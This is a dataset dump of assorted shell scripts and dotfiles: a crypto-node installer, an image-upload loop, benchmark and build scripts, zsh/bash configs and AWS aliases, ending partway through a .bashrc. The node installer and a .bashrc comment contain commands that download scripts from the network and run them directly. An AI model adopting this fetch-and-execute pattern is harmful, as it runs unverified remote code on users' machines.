blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 4 115 | path stringlengths 2 970 | src_encoding stringclasses 28 values | length_bytes int64 31 5.38M | score float64 2.52 5.28 | int_score int64 3 5 | detected_licenses listlengths 0 161 | license_type stringclasses 2 values | text stringlengths 31 5.39M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
24c6b6408d314798a521c359e1c9e087e8a839d2 | Shell | dirty-harry/node-installer | /install-node.sh | UTF-8 | 1,086 | 3.1875 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# =================== RUN THIS ========================
# bash <( curl -s https://raw.githubusercontent.com/thecrypt0hunter/node-installer/master/install-node.sh )"
# =====================================================
## Only tested with linux-x64 & Ubuntu 16 & 18 - feel free to do a PR to improve compatibility ##
# Abort on the first failed command so a broken download is never executed.
set -e

# Target architecture for the node binaries.
arch="linux-x64" #(Most desktop distributions like CentOS, Debian, Fedora, Ubuntu and derivatives) ##
#arch="linux-arm" #(Linux distributions running on ARM like Raspberry Pi)
#arch="rhel.6-x64" #(Red Hat Enterprise Linux)
OS="Ubuntu*"

# Ask which coin to install; the answer selects the per-coin config script.
# -r keeps backslashes in the reply literal.
read -r -p "Which Coin (redstone, x42, impleum, city, stratis)? " coin

COINSERVICEINSTALLER="https://raw.githubusercontent.com/thecrypt0hunter/node-installer/master/install-coin.sh"
COINSERVICECONFIG="https://raw.githubusercontent.com/thecrypt0hunter/node-installer/master/config/config-${coin}.sh"

# Install Coins Service: fetch the installer and its coin-specific config.
# Quoting prevents glob/word-splitting surprises (e.g. OS="Ubuntu*").
wget "${COINSERVICEINSTALLER}" -O /tmp/install-coin.sh
wget "${COINSERVICECONFIG}" -O "/tmp/config-${coin}.sh"
chmod +x /tmp/install-coin.sh
/tmp/install-coin.sh -c "${coin}" -a "${arch}" -o "${OS}"
| true |
10ba1f6d39055ea6b525122def0a6e86d1d177cb | Shell | nasebanal/nb-device4iot | /bin/get_image.sh | UTF-8 | 2,536 | 4.09375 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#========================================================================
# FILE NAME: get_image.sh
# FUNCTION: Get image and transfer it to AWS
# VERSION: 1.0
# AUTHOR: S.Yatsuzuka
#
# Copyright (C) 2016 NASEBANAL
#========================================================================

#======= Check Arguments =======
# $1 (Mode): 0 = loop forever, anything else = capture once and exit.
# $2 (Output File, optional): log file for the capture command's stdout.
if [ $# -eq 0 ] || [ $# -gt 2 ]; then
  echo
  echo "Usage: $0 <Mode> [Output File]"
  echo
  echo "  <Mode>"
  echo "     0: loop"
  echo "     other: one time"
  echo
  echo "  [Output File]"
  echo "     log file name (optional)"
  echo
  exit 1
fi

#======= Get Arguments =======
MODE="$1"
if [ $# -eq 2 ]; then
  OUTPUT_FILE="$2"
  echo "OUTPUT_FILE = ${OUTPUT_FILE}"
fi

#======= Check NB Home =======
# NB_HOME is the installation root (parameter files, temp area).
if [ -z "${NB_HOME}" ]; then
  echo
  echo "ERROR: NB_HOME isn't set as environment variable"
  echo
  exit 1
fi

#======= Check OpenCV Home =======
if [ -z "${OPENCV_HOME}" ]; then
  echo
  echo "ERROR: OPENCV_HOME isn't set as environment variable"
  echo
  exit 1
fi

#======= Check PID file =======
# Simple lock: refuse to start if another instance appears to be running.
PIDFILE="${NB_HOME}/temp/pid.txt"
if [ -e "${PIDFILE}" ]; then
  echo "INFO: pidfile exists"
  exit 0
fi
echo $$ > "${PIDFILE}"
# Remove our PID file on any exit path (normal, error, or signal) so a
# crashed run cannot permanently block future invocations.
trap 'rm -f "${PIDFILE}"' EXIT

#======= Get Parameter =======
# Defines NB_CMD, NB_OUTPUT_IMG, NB_WAITING_TIME, remote-host settings, etc.
source "${NB_HOME}/param/get_image.param"
echo "CMD = ${NB_CMD}"

#======= Get Work Orders =======

#======= Call Program =======
while true
do
  DATE=$(date +%Y%m%d%H%M%S)
  IMAGE_FILE="${DATE}.jpg"
  echo "IMAGE_FILE = ${IMAGE_FILE}"

  # Run the capture command, optionally redirecting its output to the log.
  # NB_CMD is intentionally unquoted: it may contain arguments.
  if [ $# -eq 1 ]; then
    ${NB_CMD}
  else
    ${NB_CMD} > "${OUTPUT_FILE}"
  fi

  #======= Create Meta file =======
  DIRECTORY="${NB_HOME}/temp/${DATE}"
  META_FILE="${DATE}.meta"
  mkdir "${DIRECTORY}"
  cp "${NB_OUTPUT_IMG}" "${DIRECTORY}/${IMAGE_FILE}"
  touch "${DIRECTORY}/${META_FILE}"

  #======= Transfer image files =======
  # NB_DEBUG, when set, redirects uploads to an alternate debug host.
  if [ -z "${NB_DEBUG}" ]; then
    scp -i "${NB_KEY_FILE}" -r "${DIRECTORY}" "${NB_REMOTE_USER}@${NB_REMOTE_HOST}:${NB_REMOTE_IMAGE_PATH}/waiting/"
    scp -i "${NB_KEY_FILE}" "${NB_OUTPUT_IMG}" "${NB_REMOTE_USER}@${NB_REMOTE_HOST}:${NB_REMOTE_IMAGE_PATH}/"
  else
    scp -r "${DIRECTORY}" "${NB_DEBUG_USER}@${NB_DEBUG_HOST}:${NB_DEBUG_IMAGE_PATH}/waiting/"
    scp "${NB_OUTPUT_IMG}" "${NB_DEBUG_USER}@${NB_DEBUG_HOST}:${NB_DEBUG_IMAGE_PATH}/"
  fi
  rm -rf "${DIRECTORY}"

  # Mode 0 keeps looping; any other mode is a one-shot run.
  if [ "${MODE}" -ne 0 ]; then
    echo
    break
  fi
  sleep "${NB_WAITING_TIME}"
done

#======= Remove pid file =======
# Handled by the EXIT trap installed above.
| true |
0062d59c381a8d459c3902024cc50551bd9e9a28 | Shell | dynaroars/gentree | /benchmarks/scripts/run_otter.sh | UTF-8 | 297 | 2.78125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
set -e

# Run one benchmark target through igen4.
# $1 - benchmark name (subdirectory under 2/ and res/)
# $2 - "full" to additionally compute the exhaustive ground-truth result
run(){
    local name=$1
    mkdir -p "res/$name"
    # Drop any stale cache so the run starts from scratch.
    rm -rf "2/$name.cachedb"
    ./igen4 -J2 -crwx -YF "2/$name" --rep 11 -O "res/$name/a_{i}.txt" -j10 --rep-para 4
    if [ "$2" = "full" ]; then
        ./igen4 -J2 -crwx -YF "2/$name" -O "res/$name/full.txt" --full -j16
    fi
}

run vsftpd notfull
run ngircd full | true |
105fd4b4aa5137e79029a430f8df87d132cc5049 | Shell | softdevteam/ykrustc | /compiler/rustc_codegen_cranelift/scripts/config.sh | UTF-8 | 877 | 2.859375 | 3 | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"BSD-2-Clause",
"LicenseRef-scancode-other-permissive",
"NCSA"
] | permissive | # Note to people running shellcheck: this file should only be sourced, not executed directly.
set -e
# Ask rustc for the platform-specific dylib file name of the backend crate
# (e.g. librustc_codegen_cranelift.so / .dylib).
dylib=$(echo "" | rustc --print file-names --crate-type dylib --crate-name rustc_codegen_cranelift -)
# sccache caches compiler invocations and would interfere with the custom
# codegen backend, so disable it if it is configured as the wrapper.
if echo "$RUSTC_WRAPPER" | grep sccache; then
echo
echo -e "\x1b[1;93m=== Warning: Unset RUSTC_WRAPPER to prevent interference with sccache ===\x1b[0m"
echo
export RUSTC_WRAPPER=
fi
# Absolute directory containing this (sourced) script.
dir=$(cd "$(dirname "${BASH_SOURCE[0]}")"; pwd)
# Route compilation through the cg_clif wrapper binary.
export RUSTC=$dir"/bin/cg_clif"
# NOTE(review): "$linker" is not defined in this file — presumably exported
# by a caller before sourcing; verify before refactoring.
export RUSTDOCFLAGS=$linker' -Cpanic=abort -Zpanic-abort-tests '\
'-Zcodegen-backend='$dir'/lib/'$dylib' --sysroot '$dir
# FIXME fix `#[linkage = "extern_weak"]` without this
if [[ "$(uname)" == 'Darwin' ]]; then
export RUSTFLAGS="$RUSTFLAGS -Clink-arg=-undefined -Clink-arg=dynamic_lookup"
fi
# Make the sysroot and backend libraries discoverable at run time
# (DYLD_* is the macOS equivalent of LD_LIBRARY_PATH).
export LD_LIBRARY_PATH="$(rustc --print sysroot)/lib:"$dir"/lib"
export DYLD_LIBRARY_PATH=$LD_LIBRARY_PATH
| true |
82ac63b79adbd7ea9f174c819cd973fd59cbca64 | Shell | sria91-rlox/rlox-4 | /util/test.sh | UTF-8 | 530 | 3.390625 | 3 | [] | no_license | #!/bin/bash
# Run one .lox interpreter test.  The expected output is embedded in the
# test file itself as "// expect: ..." / "// expect runtime error: ..."
# comments; the script diffs that against the interpreter's actual output.
lox=$1
if [ -z "$lox" ] || [ ! -f "$lox" ]; then
    echo "Usage: $0 <test.lox>" >&2
    exit 2
fi
echo "$lox ..."

# Use perl to grab the expected output, marked with "// expect: "
expected=$( perl -ne 'print "$1\n" if /\/\/ expect: (.*)/; print "error: $1\n" if /\/\/ expect runtime error: (.*)/;' < "$lox" )

# Run the interpreter (--quiet suppresses the "Compiling/Finished/Running" messages)
actual=$( cargo run --quiet -- "$lox" --simple-errors 2>&1 )

# Compare the expected output to the actual output
colordiff -u --label "$lox (expected)" <(echo "$expected") --label "$lox (actual)" <(echo "$actual")
| true |
eb9834a72ad6526ddbd8f1854eda07c6bb015675 | Shell | ianrenton/config | /.zshrc | UTF-8 | 4,478 | 2.65625 | 3 | [] | no_license | source /etc/profile
# == History ==
export HISTFILE=~/.zsh_history
export HISTSIZE=50000
export SAVEHIST=50000
setopt APPENDHISTORY
setopt HIST_IGNORE_DUPS
setopt HIST_IGNORE_ALL_DUPS
setopt HIST_REDUCE_BLANKS
setopt HIST_IGNORE_SPACE
setopt HIST_NO_STORE
setopt HIST_VERIFY
setopt HIST_SAVE_NO_DUPS
setopt HIST_EXPIRE_DUPS_FIRST
setopt HIST_FIND_NO_DUPS
setopt NOBANGHIST
# == Auto-complete ==
autoload -Uz compinit
compinit
setopt COMPLETEALIASES
zstyle ':completion:*' list-colors "=(#b) #([0-9]#)*=36=31"
zstyle ':completion:*:descriptions' format '%U%d%u'
zstyle ':completion:*:warnings' format 'No matches for: %B%d%b'
zstyle ':completion:*' menu select=2 # show menu when at least 2 options.
zstyle ':completion::complete:cd::' tag-order '! users' - # do not auto complete user names
zstyle ':completion:*' tag-order '! users' # listing all users takes ages.
# speed up git autocomplete
# Override zsh's git completion file lister: complete plain local files
# instead of asking git for its file list, which is much faster in large
# repositories.
__git_files() {
_wanted files expl 'local files' _files
}
# show waiting dots.
#expand-or-complete-with-dots() {
# echo -n "\e[1;34m.....\e[0m"
# zle expand-or-complete
# zle redisplay
#}
#zle -N expand-or-complete-with-dots
#bindkey "^I" expand-or-complete-with-dots
# == Corrections ==
#setopt CORRECTALL
# == Colors ==
export CLICOLORS=1
export LSCOLORS=Gxfxcxdxbxegedabagacad
solarized_green="\e[0;32m"
solarized_red="\e[0;31m"
solarized_blue="\e[0;34m"
solarized_yellow="\e[0;33m"
# == Extra prompt info ==
setopt PROMPT_SUBST
#autoload -Uz vcs_info
# Emit the current VCS (branch) info for the prompt, but only when inside
# a repository (vcs_info leaves vcs_info_msg_0_ empty otherwise).
# NOTE(review): the 'autoload -Uz vcs_info' line above is commented out, so
# vcs_info may be undefined when this runs — confirm before relying on it.
# NOTE(review): "$del" is not defined anywhere in this file — presumably a
# delimiter string set elsewhere; verify.
vcs_info_wrapper() {
vcs_info
if [ -n "$vcs_info_msg_0_" ]; then
echo "${vcs_info_msg_0_}$del"
fi
}
zstyle ':vcs_info:*' formats '%F{5}[%F{2}%b%F{5}]%f'
zstyle ':vcs_info:*' actionformats '%F{5}[%F{2}%b%F{3}|%F{1}%a%F{5}]%f'
zstyle ':vcs_info:(sv[nk]|bzr):*' branchformat '%b%F{1}:%F{3}%r'
# == Prompt config ==
export PS1="$(print '%{\e[0;32m%}%n%{\e[0;32m%}@%{\e[0;32m%}%m%{\e[0m%}:%{\e[0;34m%}%~%{\e[0m%}')$ "
# == Keyboard ==
#bindkey '^a' beginning-of-line # Home
#bindkey '^e' end-of-line # End
#bindkey '^R' history-incremental-search-backward
#bindkey "\e[Z" reverse-menu-complete # Shift+Tab
#bindkey "^[[3~" delete-char
#bindkey "^[3;5~" delete-char
# various fixes for HOME / END keys.
#bindkey "\e[1~" beginning-of-line
#bindkey "\e[4~" end-of-line
#bindkey "\e[5~" beginning-of-history
#bindkey "\e[6~" end-of-history
#bindkey "\e[7~" beginning-of-line
#bindkey "\e[8~" end-of-line
#bindkey "\eOH" beginning-of-line
#bindkey "\eOF" end-of-line
#bindkey "\e[H" beginning-of-line
#bindkey "\e[F" end-of-line
# if this goes wrong again try here: https://wiki.archlinux.org/index.php/Zsh
bindkey '^[[A' up-line-or-history # Fix cursor position on history recall
bindkey '^[[B' down-line-or-history # as on Debian these default to vi-*.
# 2x Ctrl-Z to kill with extreme prejudice, or stash the current command and put it back later if there is something in the buffer
# Ctrl-Z behavior: if something is already typed on the command line, stash
# it (push-input) and restore it after the next command; if the line is
# empty, force-kill the current job instead.
fancy-ctrl-z () {
  if (( $#BUFFER )); then
    zle push-input
  else
    kill -9 %+
    zle redisplay
  fi
}
zle -N fancy-ctrl-z
bindkey '^Z' fancy-ctrl-z
# == Aliases ==
if [ -f ~/.aliases ]; then
. ~/.aliases
fi
# ==Helpers ==
# Alt-S inserts "sudo " at the start of line.
insert_sudo () { zle beginning-of-line; zle -U "sudo " }
zle -N insert-sudo insert_sudo
bindkey "^[s" insert-sudo
# == tmp config helper ==
export ZSH_TMP="/tmp/zsh_$USER/"
mkdir -p $ZSH_TMP
chmod 700 $ZSH_TMP
# == Current directory ==
export ZSH_CURRENT_PATH="$ZSH_TMP/.zshpwd"
# zsh hook: runs automatically after every directory change.  Persists the
# new cwd to $ZSH_CURRENT_PATH (so new shells can resume there) and, when
# stdout is a terminal, writes the path into the terminal title bar via an
# OSC escape sequence.
function chpwd {
echo $(pwd) >! $ZSH_CURRENT_PATH
if [[ -t 1 ]] ; then print -Pn "\e]2;%~\a" ; fi
}
if [[ -f $ZSH_CURRENT_PATH ]]; then
cd "$(cat $ZSH_CURRENT_PATH)"
fi
# == Other options ==
REPORTTIME=1 # notify on slow commands
# == Any local changes? ==
[[ -r "$HOME/.zshrc_local" ]] && source "$HOME/.zshrc_local"
# colour ls
if [ -x /usr/bin/dircolors ]; then
test -r ~/.dircolors && eval "$(dircolors -b ~/.dircolors)" || eval "$(dircolors -b)"
alias ls='ls --color=auto'
fi
# == is ssh? ==
if [ -n "$SSH_CLIENT" ] || [ -n "$SSH_TTY" ]; then
SESSION_TYPE=ssh
else
case $(ps -o comm= -p $PPID) in
sshd|*/sshd) SESSION_TYPE=ssh;;
esac
fi
if [ -n "$SUDO_USER" ] || [ -n "$SUDO_COMMAND" ]; then
SESSION_TYPE=sudo
fi
# fortune, because fortune
fortune &&
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/var/lib/gems/1.8/bin:/usr/local/rvm/bin:/home/ian/.local/bin
alias rake="bundle exec rake"
alias md="mkdir"
alias update="sudo apt-get update && sudo apt-get upgrade"
| true |
7bd503d01caf251ea160ed993c2274169a5648b1 | Shell | agoila/udacity-dlnd-aws | /aws-alias.sh | UTF-8 | 1,695 | 2.875 | 3 | [
"Apache-2.0"
] | permissive | #!/bin/bash
#This file has been modified from the original file found here: https://github.com/fastai/courses/blob/master/setup/aws-alias.sh

# Find the (stopped) g2.2xlarge instance and remember its id.
alias aws-get-g2='export instanceId=`aws ec2 describe-instances --filters "Name=instance-state-name,Values=stopped,Name=instance-type,Values=g2.2xlarge" --query "Reservations[0].Instances[0].InstanceId"` && echo $instanceId'
# Start the instance, wait for it to come up, and record its public IP.
alias aws-start='aws ec2 start-instances --instance-ids $instanceId && aws ec2 wait instance-running --instance-ids $instanceId && export instanceIp=`aws ec2 describe-instances --filters "Name=instance-id,Values=$instanceId" --query "Reservations[0].Instances[0].PublicIpAddress"` && echo $instanceIp'
# Refresh the cached public IP for the current instance.
alias aws-ip='export instanceIp=`aws ec2 describe-instances --filters "Name=instance-id,Values=$instanceId" --query "Reservations[0].Instances[0].PublicIpAddress"` && echo $instanceIp'
alias aws-ssh='ssh -i ~/.ssh/aws-key-udacity-dl.pem ubuntu@$instanceIp'
alias aws-stop='aws ec2 stop-instances --instance-ids $instanceId'

# Pick the platform-appropriate command for opening the Jupyter notebook
# URL in a browser (one uname call instead of three duplicated if-blocks).
case "$(uname)" in
    *CYGWIN*)
        # This is cygwin. Use cygstart to open the notebook
        alias aws-nb='cygstart http://$instanceIp:8888' ;;
    *Linux*)
        # This is linux. Use xdg-open to open the notebook
        alias aws-nb='xdg-open http://$instanceIp:8888' ;;
    *Darwin*)
        # This is Mac. Use open to open the notebook
        alias aws-nb='open http://$instanceIp:8888' ;;
esac

# Modify this to point to your AWS instanceId. Check your AWS console/instance page.
# For California,
# https://us-west-1.console.aws.amazon.com/ec2/v2/home?region=us-west-1#Instances:sort=instanceId
export instanceId=i-9aa9c282
| true |
a5aec63498932f6adaf50fb58ef83338bbc4811b | Shell | xumc/study | /shell/delete_files.sh | UTF-8 | 181 | 3.328125 | 3 | [] | no_license | for filename in `ls`
do
# Loop body: delete zero-byte regular files in the current directory.
# NOTE(review): iterating over `ls` output (header line) and using
# $filename unquoted breaks on names with spaces or glob characters;
# 'find . -maxdepth 1 -type f -size 0 -delete' would be safer — confirm
# before changing behavior.
# Skip directories; b=0 is only a placeholder so the branch is non-empty.
if test -d $filename
then
b=0
else
# File size taken from column 5 of 'ls -l' output.
a=$(ls -l $filename | awk '{ print $5 }')
if test $a -eq 0
then
rm $filename
fi
fi
done
| true |
eb4f558ac5141d336d46c6d0f229a322963b0327 | Shell | gwl0913/testRepository | /flowCtl.sh | UTF-8 | 694 | 3.546875 | 4 | [] | no_license | #!/bin/bash
# if demo: note the space after 'if' and around the brackets of [ ].
# Default the first argument to 0 so the tests don't error when no
# argument is supplied.
arg=${1:-0}
if [ "$arg" -eq 1 ]
then
echo eq1
elif [ "$arg" -eq 2 ]
then
echo 'eq2'
fi

# case demo
# case $variable in ...
case "$arg" in
1)
echo one
;;
2)
echo tow
;;
*)
echo default
;;
esac

# C-style for loop demo: sum 1..4
s=0
for((i=1;i<5;i++))
do
s=$((s + i))
done
echo "for add result: $s"

# for-in demo: iterate over every positional parameter.
# "$@" keeps each argument intact even if it contains spaces.
for p in "$@"
do
echo "input paramer $p"
done
# for p in $*
# do
# echo "input paramer $p"
# done
# for p in "$@"
# do
# echo "input paramer $p"
# done
# for p in "$*"
# do
# echo "input paramer $p"
# done

# while demo: sum 1..100 ($(( )) replaces the deprecated $[ ] syntax)
s=0
i=1
while [ "$i" -le 100 ]
do
s=$((s + i))
i=$((i + 1))
done
echo "1 plus to 100 is: $s" | true |
9be092595a3684c459bbe5f66e9a69aeef113ef5 | Shell | conda-forge/openexr-feedstock | /recipe/build.sh | UTF-8 | 361 | 2.53125 | 3 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | #!/bin/bash
# Out-of-source CMake build in ./build.
mkdir build
cd build
# __STDC_FORMAT_MACROS exposes the C99 PRI*/SCN* format macros to C++.
export CFLAGS="$CFLAGS -D__STDC_FORMAT_MACROS"
export CXXFLAGS="$CXXFLAGS -D__STDC_FORMAT_MACROS"
# Configure: install into the conda prefix, shared release libraries,
# plain 'lib' libdir, and no version suffix on the OpenEXR library names.
cmake ${CMAKE_ARGS} -DCMAKE_INSTALL_PREFIX=$PREFIX \
-DBUILD_SHARED_LIBS=ON \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_INSTALL_LIBDIR=lib \
-DOPENEXR_LIB_SUFFIX="" \
..
# Parallel build sized by the CPU count conda-build provides.
make -j${CPU_COUNT}
make install
b421748d885ae32457530c418e6b56df9c88b86c | Shell | bradyrx/dotfiles | /.bashrc | UTF-8 | 27,317 | 3.328125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
#.bashrc
#-----------------------------------------------------------------------------#
# This file should override defaults in /etc/profile in /etc/bashrc.
# Check out what is in the system defaults before using this, make sure your
# $PATH is populated. To SSH between servers without password use:
# https://www.thegeekstuff.com/2008/11/3-steps-to-perform-ssh-login-without-password-using-ssh-keygen-ssh-copy-id/
# A few notes:
# * Prefix key for issuing SSH-session commands is '~'; 'exit' sometimes doesn't work (perhaps because
# if aliased or some 'exit' is in $PATH
# C-d/'exit' -- IF AVAILABLE, exit SSH session
# ~./~C-z -- Exit SSH session
# ~& -- Puts SSH into background
# ~# -- Gives list of forwarded connections in this session
# ~? -- Gives list of these commands
# * Extended globbing explanations, see:
# http://mywiki.wooledge.org/glob
# * Use '<package_manager> list' for MOST PACKAGE MANAGERS to see what is installed
# e.g. brew list, conda list, pip list
#-----------------------------------------------------------------------------#
# Bail out, if not running interactively (e.g. when sending data packets over with scp/rsync)
# Known bug, scp/rsync fail without this line due to greeting message:
# 1) https://unix.stackexchange.com/questions/88602/scp-from-remote-host-fails-due-to-login-greeting-set-in-bashrc
# 2) https://unix.stackexchange.com/questions/18231/scp-fails-without-error
[[ $- != *i* ]] && return
# clear # first clear screen
# Prompt
# Keep things minimal, just make prompt boldface so its a bit more identifiable
if [ -z "$_ps1_set" ]; then # don't overwrite modifications by supercomputer modules, conda environments, etc.
export PS1='\[\033[1;37m\]\h[\j]:\W\$ \[\033[0m\]' # prompt string 1; shows "<comp name>:<work dir> <user>$"
_ps1_set=1
fi
# Message constructor; modify the number to increase number of dots
# export PS1='\[\033[1;37m\]\h[\j]:\W \u\$ \[\033[0m\]' # prompt string 1; shows "<comp name>:<work dir> <user>$"
# style; the \[ \033 chars are escape codes for changing color, then restoring it at end
# see: https://stackoverflow.com/a/28938235/4970632
# also see: https://unix.stackexchange.com/a/124408/112647
# Print LABEL followed by enough dots to pad the output to 29 characters
# (used to align "Section......done" progress messages).
# Fix: the label is passed as a '%s' argument, never as the printf format
# string, so labels containing '%' can no longer corrupt the output.
_bashrc_message() {
  local label=$1 pad
  pad=$(printf '.%.0s' $(seq 1 $((29 - ${#label}))))
  printf '%s%s' "$label" "$pad"
}
#-----------------------------------------------------------------------------#
# Bash_it config
#-----------------------------------------------------------------------------#
# Path to the bash it configuration
export BASH_IT=$HOME/.bash_it
export BASH_IT_THEME='sexy'
export GIT_HOSTING='git@github.com'
export EDITOR="vim"
export GIT_EDITOR='vim'
# Don't check mail when opening terminal.
unset MAILCHECK
source $BASH_IT/bash_it.sh
#-----------------------------------------------------------------------------#
# Settings for particular machines
# Custom key bindings and interaction
#-----------------------------------------------------------------------------#
# Reset all aliases
# Very important! Sometimes we wrap new aliases around existing ones, e.g. ncl!
unalias -a
# Flag for if in MacOs
[[ "$OSTYPE" == "darwin"* ]] && _macos=true || _macos=false
# Python stuff
# Must set PYTHONBUFFERED or else running bash script that invokes python will
# prevent print statements from getting flushed to stdout until exe finishes
unset PYTHONPATH
export PYTHONUNBUFFERED=1
# First, the path management
# _bashrc_message "Variables and modules"
if $_macos; then
# Defaults, LaTeX, X11, Homebrew, Macports, PGI compilers, and local compilations
# NOTE: Added ffmpeg with sudo port install ffmpeg +nonfree
# NOTE: Added matlab as a symlink in builds directory
# NOTE: Install gcc and gfortran with 'port install gcc6' then
# 'port select --set gcc mp-gcc6' (check 'port select --list gcc')
export PATH=$(tr -d $'\n ' <<< "
$HOME/builds/ncl-6.5.0/bin:$HOME/builds/matlab/bin:
/opt/pgi/osx86-64/2018/bin:
/usr/local/bin:
/opt/local/bin:/opt/local/sbin:
/opt/X11/bin:/Library/TeX/texbin:
/usr/bin:/bin:/usr/sbin:/sbin:
")
export LM_LICENSE_FILE="/opt/pgi/license.dat-COMMUNITY-18.10"
export PKG_CONFIG_PATH="/opt/local/bin/pkg-config"
# Add RVM to PATH for scripting. Make sure this is the last PATH variable change.
# WARNING: Need to install with rvm! Get endless issues with MacPorts/Homebrew
# versions! See: https://stackoverflow.com/a/3464303/4970632
# Test with: ruby -ropen-uri -e 'eval open("https://git.io/vQhWq").read'
# Install rvm with: \curl -sSL https://get.rvm.io | bash -s stable --ruby
if [ -d ~/.rvm/bin ]; then
[[ -s "$HOME/.rvm/scripts/rvm" ]] && source "$HOME/.rvm/scripts/rvm" # Load RVM into a shell session *as a function*
export PATH="$PATH:$HOME/.rvm/bin"
rvm use ruby 1>/dev/null
fi
# NCL NCAR command language, had trouble getting it to work on Mac with conda
# NOTE: By default, ncl tried to find dyld to /usr/local/lib/libgfortran.3.dylib;
# actually ends up in above path after brew install gcc49; and must install
# this rather than gcc, which loads libgfortran.3.dylib and yields gcc version 7
# Tried DYLD_FALLBACK_LIBRARY_PATH but it screwed up some python modules
alias ncl='DYLD_LIBRARY_PATH="/opt/local/lib/libgcc" ncl' # fix libs
export NCARG_ROOT="$HOME/builds/ncl-6.5.0" # critically necessary to run NCL
else
case $HOSTNAME in
# Cheyenne supercomputer, any of the login nodes
cheyenne*)
# Edit library path
# Set tmpdir following direction of: https://www2.cisl.ucar.edu/user-support/storing-temporary-files-tmpdir
export LD_LIBRARY_PATH="/glade/u/apps/ch/opt/netcdf/4.6.1/intel/17.0.1/lib:$LD_LIBRARY_PATH"
export TMPDIR=/glade/scratch/$USER/tmp
# Load some modules
# NOTE: Use 'qinteractive' for interactive mode
_loaded=($(module --terse list 2>&1)) # already loaded
_toload=(nco tmux cdo ncl)
for _module in ${_toload[@]}; do
if [[ ! " ${_loaded[@]} " =~ "$_module" ]]; then
module load $_module
fi
done
;; *) echo "\"$HOSTNAME\" does not have custom settings. You may want to edit your \".bashrc\"."
;; esac
fi
# Access custom executables and git repos
# e.g., ack.
export PATH=$(tr -d $'\n ' <<< "
$HOME/bin:
$PATH
")
# Save path before setting up conda
# Brew conflicts with anaconda (try "brew doctor" to see)
alias brew="PATH=\"$PATH\" brew"
# Matplotlib stuff
# May be necessary for rendering fonts in ipython notebooks
# See: https://github.com/olgabot/sciencemeetproductivity.tumblr.com/blob/master/posts/2012/11/how-to-set-helvetica-as-the-default-sans-serif-font-in.md
export MPLCONFIGDIR=$HOME/.matplotlib
# printf "done\n"
#-----------------------------------------------------------------------------#
# Anaconda stuff
#-----------------------------------------------------------------------------#
unset _conda
if [ -d "$HOME/anaconda3" ]; then
_conda='anaconda3'
elif [ -d "$HOME/miniconda3" ]; then
_conda='miniconda3'
else # Case for CU Summit computer.
_conda='projects/miniconda3'
fi
if [ -n "$_conda" ] && ! [[ "$PATH" =~ "conda" ]]; then # above doesn't work, need to just check path
# For info on what's going on see: https://stackoverflow.com/a/48591320/4970632
# The first thing creates a bunch of environment variables and functions
# The second part calls the 'conda' function, which calls an activation function, which does the
# whole solving environment thing
# If you use the '. activate' version, there is an 'activate' file in bin
# that does these two things
# _bashrc_message "Enabling conda"
source $HOME/$_conda/etc/profile.d/conda.sh # set up environment variables
CONDA_CHANGEPS1=false conda activate # activate the default environment, without changing PS1
# Show the installed vs. newest available version of a conda package.
# Usage: avail PACKAGE
avail() {
local current latest
[ $# -ne 1 ] && echo "Usage: avail PACKAGE" && return 1
# First matching row of 'conda list' = installed version (column 2).
current=$(conda list "$1" | grep '\b'"$1"'\b' | awk 'NR == 1 {print $2}')
# Last matching row of 'conda search' = newest available version.
latest=$(conda search "$1" | grep '\b'"$1"'\b' | awk 'END {print $2}')
echo "Package: $1"
echo "Current version: $current"
echo "Latest version: $latest"
}
# printf "done\n"
fi
#-----------------------------------------------------------------------------#
# Wrappers for common functions
#-----------------------------------------------------------------------------#
# _bashrc_message "Functions and aliases"
# Neat function that splits lines into columns so they fill the terminal window
# Pack one-item-per-line input (stdin, or $1 if given) into as many columns
# as fit the terminal width, similar to 'ls' output.  Strategy: keep adding
# columns until the widest resulting row would exceed 'tput cols', then
# print the last layout that still fit.
# Uses GNU wc (-L = longest line); on macOS that is 'gwc' from coreutils.
_columnize() {
local cmd
local input output final
local tcols ncols maxlen nlines
[ $# -eq 0 ] && input=$(cat /dev/stdin) || input="$1"
! $_macos && cmd=wc || cmd=gwc
ncols=1 # start with 1
tcols=$(tput cols)
maxlen=0 # initial
nlines=$(printf "$input" | $cmd -l) # check against initial line count
output="$input" # default
while true; do
final="$output" # record previous output, this is what we will print
output=$(printf "$input" | xargs -n$ncols | column -t)
maxlen=$(printf "$output" | $cmd -L)
# maxlen=$(printf "$output" | awk '{print length}' | sort -nr | head -1) # or wc -L but that's unavailable on mac
[ $maxlen -gt $tcols ] && break # this time *do not* print latest result, will result in line break due to terminal edge
[ $ncols -gt $nlines ] && final="$output" && break # test *before* increment, want to use that output
# echo terminal $tcols ncols $ncols nlines $nlines maxlen $maxlen
let ncols+=1
done
printf "$final"
}
# Environment variables
export EDITOR=vim # default editor, nice and simple
export LC_ALL=en_US.UTF-8 # needed to make Vim syntastic work
# #-----------------------------------------------------------------------------#
# # SHELL BEHAVIOR, KEY BINDINGS
# #-----------------------------------------------------------------------------#
# # Readline/inputrc settings
# # Use Ctrl-R to search previous commands
# # Equivalent to putting lines in single quotes inside .inputrc
# # bind '"\C-i":glob-expand-word' # expansion but not completion
# _setup_bindings() {
# complete -r # remove completions
# bind -r '"\C-i"'
# bind -r '"\C-d"'
# bind -r '"\C-s"' # to enable C-s in Vim (normally caught by terminal as start/stop signal)
# bind 'set disable-completion off' # ensure on
# bind 'set completion-ignore-case on' # want dat
# bind 'set completion-map-case on' # treat hyphens and underscores as same
# bind 'set show-all-if-ambiguous on' # one tab press instead of two; from this: https://unix.stackexchange.com/a/76625/112647
# bind 'set menu-complete-display-prefix on' # show string typed so far as 'member' while cycling through completion options
# bind 'set completion-display-width 1' # easier to read
# bind 'set bell-style visible' # only let readlinke/shell do visual bell; use 'none' to disable totally
# bind 'set skip-completed-text on' # if there is text to right of cursor, make bash ignore it; only bash 4.0 readline
# bind 'set visible-stats off' # extra information, e.g. whether something is executable with *
